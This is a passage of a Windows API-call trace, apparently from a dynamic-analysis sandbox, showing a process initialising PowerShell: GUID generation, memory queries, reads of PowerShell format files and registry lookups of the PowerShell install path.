	[0287.188] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x72d5ede, Data2=0xb979, Data3=0x45a4, Data4=([0]=0xa8, [1]=0xe5, [2]=0x2, [3]=0xeb, [4]=0x9e, [5]=0xb9, [6]=0xcf, [7]=0x6e))) returned 0x0
	[0287.188] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xdbf3a11, Data2=0x4412, Data3=0x41f7, Data4=([0]=0x8d, [1]=0x2c, [2]=0x93, [3]=0xf8, [4]=0x77, [5]=0x3a, [6]=0xe3, [7]=0xa3))) returned 0x0
	[0287.188] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xa5fc9f61, Data2=0x38bf, Data3=0x4145, Data4=([0]=0xbf, [1]=0x46, [2]=0x16, [3]=0xb9, [4]=0x78, [5]=0xf, [6]=0xa4, [7]=0x7f))) returned 0x0
	[0287.188] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x8b8acc42, Data2=0x7fa4, Data3=0x477e, Data4=([0]=0xab, [1]=0x1d, [2]=0xf3, [3]=0x31, [4]=0x25, [5]=0x3, [6]=0xe3, [7]=0x2d))) returned 0x0
	[0287.188] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xe39171e1, Data2=0xb1d6, Data3=0x4ea1, Data4=([0]=0xa6, [1]=0xbc, [2]=0x3d, [3]=0x7f, [4]=0xf1, [5]=0x35, [6]=0x84, [7]=0x6))) returned 0x0
	[0287.188] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x453cd938, Data2=0x9864, Data3=0x4a9e, Data4=([0]=0xac, [1]=0x42, [2]=0xbe, [3]=0xd5, [4]=0x9a, [5]=0x84, [6]=0xee, [7]=0x1f))) returned 0x0
	[0287.188] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x9ab375d1, Data2=0xb6fc, Data3=0x4b7f, Data4=([0]=0xb4, [1]=0x2c, [2]=0x1a, [3]=0x63, [4]=0x5a, [5]=0xe1, [6]=0x6c, [7]=0x24))) returned 0x0
	[0287.189] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x3c1d1f3e, Data2=0x542b, Data3=0x4cad, Data4=([0]=0xa1, [1]=0x6c, [2]=0x9, [3]=0x76, [4]=0x61, [5]=0xa7, [6]=0xb4, [7]=0xb8))) returned 0x0
	[0287.189] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xfe2a8025, Data2=0xa8c8, Data3=0x48b1, Data4=([0]=0xbc, [1]=0x50, [2]=0xce, [3]=0xa5, [4]=0xbd, [5]=0x96, [6]=0xf9, [7]=0xd5))) returned 0x0
	[0287.189] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xfc5681ae, Data2=0xa53e, Data3=0x4f49, Data4=([0]=0x91, [1]=0x89, [2]=0x2, [3]=0x37, [4]=0xe7, [5]=0xa8, [6]=0xd1, [7]=0x16))) returned 0x0
	[0287.189] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.189] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.189] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.189] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x9bae82c5, Data2=0xcd1a, Data3=0x41c5, Data4=([0]=0xa6, [1]=0xb4, [2]=0xf1, [3]=0xe1, [4]=0x75, [5]=0xb2, [6]=0xa0, [7]=0xed))) returned 0x0
	[0287.190] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x8866bbd6, Data2=0x8f3c, Data3=0x4b65, Data4=([0]=0xa1, [1]=0x1b, [2]=0xa8, [3]=0x80, [4]=0xc7, [5]=0x4, [6]=0xdd, [7]=0xc6))) returned 0x0
	[0287.190] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xd182bfc, Data2=0xd1c4, Data3=0x4571, Data4=([0]=0xb3, [1]=0xd, [2]=0x60, [3]=0x13, [4]=0x82, [5]=0xfb, [6]=0x43, [7]=0x88))) returned 0x0
	[0287.190] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x6e9ef275, Data2=0xc55f, Data3=0x4bbd, Data4=([0]=0xbd, [1]=0xf4, [2]=0xac, [3]=0xb7, [4]=0x3d, [5]=0xc0, [6]=0x4c, [7]=0x70))) returned 0x0
	[0287.190] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xb02d8979, Data2=0x2e40, Data3=0x4ac1, Data4=([0]=0xa8, [1]=0x52, [2]=0x46, [3]=0x4b, [4]=0x57, [5]=0x32, [6]=0xea, [7]=0xd6))) returned 0x0
	[0287.190] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x7bbe8d4f, Data2=0x5294, Data3=0x47f4, Data4=([0]=0xa8, [1]=0x66, [2]=0x58, [3]=0x68, [4]=0x48, [5]=0xc1, [6]=0x70, [7]=0x2c))) returned 0x0
	[0287.190] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xbfd81bbd, Data2=0x281b, Data3=0x46d0, Data4=([0]=0xa2, [1]=0x3c, [2]=0x81, [3]=0x32, [4]=0xe4, [5]=0x74, [6]=0xff, [7]=0xdd))) returned 0x0
	[0287.191] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xb8d4afec, Data2=0x2085, Data3=0x4293, Data4=([0]=0xa4, [1]=0xe3, [2]=0xdc, [3]=0x13, [4]=0x1b, [5]=0xc0, [6]=0xd4, [7]=0xdd))) returned 0x0
	[0287.191] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xac0dd1b9, Data2=0xd8ef, Data3=0x4d79, Data4=([0]=0x9f, [1]=0x4d, [2]=0x9e, [3]=0xbd, [4]=0x94, [5]=0x40, [6]=0x35, [7]=0xf1))) returned 0x0
	[0287.191] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xde35b740, Data2=0xa15d, Data3=0x4011, Data4=([0]=0xaa, [1]=0xb2, [2]=0x34, [3]=0x2d, [4]=0xd4, [5]=0x87, [6]=0x79, [7]=0x0))) returned 0x0
	[0287.191] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x43ffe15, Data2=0xec32, Data3=0x4567, Data4=([0]=0x92, [1]=0xb9, [2]=0xb2, [3]=0xcf, [4]=0x5b, [5]=0x5, [6]=0x49, [7]=0x9f))) returned 0x0
	[0287.191] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x2ef72899, Data2=0xfbc6, Data3=0x4a95, Data4=([0]=0xaa, [1]=0x91, [2]=0xc4, [3]=0x6c, [4]=0x26, [5]=0x78, [6]=0xe3, [7]=0xd))) returned 0x0
	[0287.191] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xcfc5076f, Data2=0x67d8, Data3=0x4359, Data4=([0]=0x9d, [1]=0x40, [2]=0x76, [3]=0x6b, [4]=0xed, [5]=0x44, [6]=0x88, [7]=0x17))) returned 0x0
	[0287.191] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.192] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xef1411c1, Data2=0x8162, Data3=0x4b5b, Data4=([0]=0x92, [1]=0x72, [2]=0x58, [3]=0x1b, [4]=0xe7, [5]=0xf, [6]=0x42, [7]=0xc5))) returned 0x0
	[0287.192] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.193] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.194] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x77792ca7, Data2=0xf819, Data3=0x4308, Data4=([0]=0x89, [1]=0x4e, [2]=0xaf, [3]=0xde, [4]=0x13, [5]=0xd, [6]=0x3b, [7]=0xb5))) returned 0x0
	[0287.194] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.194] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xabf4a7a, Data2=0xa847, Data3=0x4900, Data4=([0]=0xba, [1]=0x72, [2]=0x1b, [3]=0xcc, [4]=0x1f, [5]=0x76, [6]=0xda, [7]=0x81))) returned 0x0
	[0287.194] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x397c0281, Data2=0x361e, Data3=0x4e53, Data4=([0]=0xa9, [1]=0x86, [2]=0xf4, [3]=0x6e, [4]=0x97, [5]=0xf5, [6]=0x3e, [7]=0xc6))) returned 0x0
	[0287.194] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x56bba5a8, Data2=0xbcfa, Data3=0x479d, Data4=([0]=0xa6, [1]=0xd8, [2]=0x33, [3]=0xc2, [4]=0x86, [5]=0xe, [6]=0x8d, [7]=0xff))) returned 0x0
	[0287.195] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xac78ef02, Data2=0x281c, Data3=0x488c, Data4=([0]=0x98, [1]=0x19, [2]=0x75, [3]=0x57, [4]=0x94, [5]=0x7a, [6]=0x55, [7]=0x73))) returned 0x0
	[0287.195] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xa6fa6de7, Data2=0x6097, Data3=0x4a8a, Data4=([0]=0x97, [1]=0x4c, [2]=0x29, [3]=0x6d, [4]=0xe5, [5]=0x3f, [6]=0x23, [7]=0x98))) returned 0x0
	[0287.195] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x5d90d82, Data2=0x6b41, Data3=0x4175, Data4=([0]=0xa9, [1]=0xf2, [2]=0xac, [3]=0xef, [4]=0x3c, [5]=0xeb, [6]=0x4b, [7]=0xfd))) returned 0x0
	[0287.195] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x3130ad72, Data2=0xc87c, Data3=0x4040, Data4=([0]=0xa6, [1]=0xad, [2]=0x26, [3]=0xd0, [4]=0x35, [5]=0x6f, [6]=0x21, [7]=0x42))) returned 0x0
	[0287.195] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.195] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x5c4be841, Data2=0xd848, Data3=0x4e77, Data4=([0]=0xaf, [1]=0x94, [2]=0x20, [3]=0x11, [4]=0x9c, [5]=0x90, [6]=0xb0, [7]=0xb5))) returned 0x0
	[0287.196] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x9b7a982b, Data2=0xe1af, Data3=0x41c8, Data4=([0]=0xb8, [1]=0xed, [2]=0x86, [3]=0xa1, [4]=0x91, [5]=0x75, [6]=0xa4, [7]=0xe7))) returned 0x0
	[0287.196] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x6419f855, Data2=0x73ee, Data3=0x4d67, Data4=([0]=0x87, [1]=0x8e, [2]=0xa, [3]=0xef, [4]=0x14, [5]=0xb1, [6]=0xc, [7]=0xf9))) returned 0x0
	[0287.196] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xc81e1000, Data2=0x11c5, Data3=0x4d7d, Data4=([0]=0x8c, [1]=0xd4, [2]=0x12, [3]=0x3f, [4]=0x72, [5]=0x73, [6]=0xa5, [7]=0x54))) returned 0x0
	[0287.196] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xa4011d26, Data2=0xe2a0, Data3=0x4a65, Data4=([0]=0xad, [1]=0xfc, [2]=0x95, [3]=0x1b, [4]=0x36, [5]=0x34, [6]=0x6f, [7]=0x87))) returned 0x0
	[0287.196] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.196] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x6c86810f, Data2=0x2713, Data3=0x4c4c, Data4=([0]=0x87, [1]=0x5b, [2]=0xa6, [3]=0x18, [4]=0x7a, [5]=0x5d, [6]=0x9f, [7]=0xba))) returned 0x0
	[0287.196] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x53a3154f, Data2=0x6b29, Data3=0x4d41, Data4=([0]=0x8c, [1]=0xbf, [2]=0x93, [3]=0xb1, [4]=0xf7, [5]=0x66, [6]=0xcd, [7]=0x6e))) returned 0x0
	[0287.197] VirtualQuery (in: lpAddress=0x26bd50, lpBuffer=0x26cc10, dwLength=0x30 | out: lpBuffer=0x26cc10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.197] VirtualQuery (in: lpAddress=0x26bd50, lpBuffer=0x26cc10, dwLength=0x30 | out: lpBuffer=0x26cc10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.197] VirtualQuery (in: lpAddress=0x26bd50, lpBuffer=0x26cc10, dwLength=0x30 | out: lpBuffer=0x26cc10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.197] VirtualQuery (in: lpAddress=0x26bd50, lpBuffer=0x26cc10, dwLength=0x30 | out: lpBuffer=0x26cc10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.197] SetErrorMode (uMode=0x1) returned 0x1
	[0287.197] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0287.197] SetErrorMode (uMode=0x1) returned 0x1
	[0287.197] GetFileType (hFile=0x32c) returned 0x1
	[0287.198] ReadFile (in: hFile=0x32c, lpBuffer=0x3288ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3288ac8*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0287.198] ReadFile (in: hFile=0x32c, lpBuffer=0x3288ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3288ac8*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0287.198] ReadFile (in: hFile=0x32c, lpBuffer=0x3288ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3288ac8*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0287.198] ReadFile (in: hFile=0x32c, lpBuffer=0x3288ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3288ac8*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0287.198] ReadFile (in: hFile=0x32c, lpBuffer=0x3288ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3288ac8*, lpNumberOfBytesRead=0x26d078*=0x8b4, lpOverlapped=0x0) returned 1
	[0287.198] ReadFile (in: hFile=0x32c, lpBuffer=0x3287ee4, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3287ee4*, lpNumberOfBytesRead=0x26d078*=0x0, lpOverlapped=0x0) returned 1
	[0287.198] ReadFile (in: hFile=0x32c, lpBuffer=0x3288ac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x3288ac8*, lpNumberOfBytesRead=0x26d078*=0x0, lpOverlapped=0x0) returned 1
	[0287.198] SetErrorMode (uMode=0x1) returned 0x1
	[0287.198] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d020 | out: lpFileInformation=0x26d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0287.198] SetErrorMode (uMode=0x1) returned 0x1
	[0287.199] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d108 | out: phkResult=0x26d108*=0x32c) returned 0x0
	[0287.199] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d08c, lpData=0x0, lpcbData=0x26d088*=0x0 | out: lpType=0x26d08c*=0x1, lpData=0x0, lpcbData=0x26d088*=0x56) returned 0x0
	[0287.199] CoTaskMemAlloc (cb=0x5a) returned 0x530d80
	[0287.199] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d05c, lpData=0x530d80, lpcbData=0x26d058*=0x56 | out: lpType=0x26d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d058*=0x56) returned 0x0
	[0287.199] CoTaskMemFree (pv=0x530d80) 
	[0287.199] RegCloseKey (hKey=0x32c) returned 0x0
	[0287.199] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x588fd725, Data2=0xeb05, Data3=0x420b, Data4=([0]=0x85, [1]=0xb5, [2]=0xd2, [3]=0xa, [4]=0xfc, [5]=0xfd, [6]=0xd3, [7]=0x99))) returned 0x0
	[0287.199] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xb5070f4b, Data2=0x1feb, Data3=0x433a, Data4=([0]=0x97, [1]=0xed, [2]=0x19, [3]=0x1a, [4]=0x1c, [5]=0x92, [6]=0x47, [7]=0x1))) returned 0x0
	[0287.200] SetErrorMode (uMode=0x1) returned 0x1
	[0287.200] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0287.200] SetErrorMode (uMode=0x1) returned 0x1
	[0287.200] GetFileType (hFile=0x32c) returned 0x1
	[0287.200] ReadFile (in: hFile=0x32c, lpBuffer=0x32c68b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x32c68b0*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0287.200] ReadFile (in: hFile=0x32c, lpBuffer=0x32c68b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x32c68b0*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0287.200] ReadFile (in: hFile=0x32c, lpBuffer=0x32c68b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x32c68b0*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0287.200] ReadFile (in: hFile=0x32c, lpBuffer=0x32c68b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x32c68b0*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0287.200] ReadFile (in: hFile=0x32c, lpBuffer=0x32c68b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x32c68b0*, lpNumberOfBytesRead=0x26d078*=0xe98, lpOverlapped=0x0) returned 1
	[0287.201] ReadFile (in: hFile=0x32c, lpBuffer=0x32c5eb0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x32c5eb0*, lpNumberOfBytesRead=0x26d078*=0x0, lpOverlapped=0x0) returned 1
	[0287.201] ReadFile (in: hFile=0x32c, lpBuffer=0x32c68b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x32c68b0*, lpNumberOfBytesRead=0x26d078*=0x0, lpOverlapped=0x0) returned 1
	[0287.201] SetErrorMode (uMode=0x1) returned 0x1
	[0287.201] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d020 | out: lpFileInformation=0x26d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0287.201] SetErrorMode (uMode=0x1) returned 0x1
	[0287.201] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d108 | out: phkResult=0x26d108*=0x32c) returned 0x0
	[0287.201] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d08c, lpData=0x0, lpcbData=0x26d088*=0x0 | out: lpType=0x26d08c*=0x1, lpData=0x0, lpcbData=0x26d088*=0x56) returned 0x0
	[0287.201] CoTaskMemAlloc (cb=0x5a) returned 0x530d80
	[0287.201] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d05c, lpData=0x530d80, lpcbData=0x26d058*=0x56 | out: lpType=0x26d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d058*=0x56) returned 0x0
	[0287.201] CoTaskMemFree (pv=0x530d80) 
	[0287.201] RegCloseKey (hKey=0x32c) returned 0x0
	[0287.202] VirtualQuery (in: lpAddress=0x26bba0, lpBuffer=0x26ca60, dwLength=0x30 | out: lpBuffer=0x26ca60*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0287.202] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x4546a9e3, Data2=0xd4a6, Data3=0x425c, Data4=([0]=0xbf, [1]=0xb5, [2]=0x88, [3]=0x5c, [4]=0xeb, [5]=0xd0, [6]=0x6c, [7]=0xa0))) returned 0x0
	[0287.202] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x39dbe6b8, Data2=0xed3a, Data3=0x4e76, Data4=([0]=0xb7, [1]=0xe1, [2]=0x22, [3]=0x31, [4]=0x27, [5]=0x9a, [6]=0xad, [7]=0x7e))) returned 0x0
	[0287.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0287.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0287.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0287.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0287.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
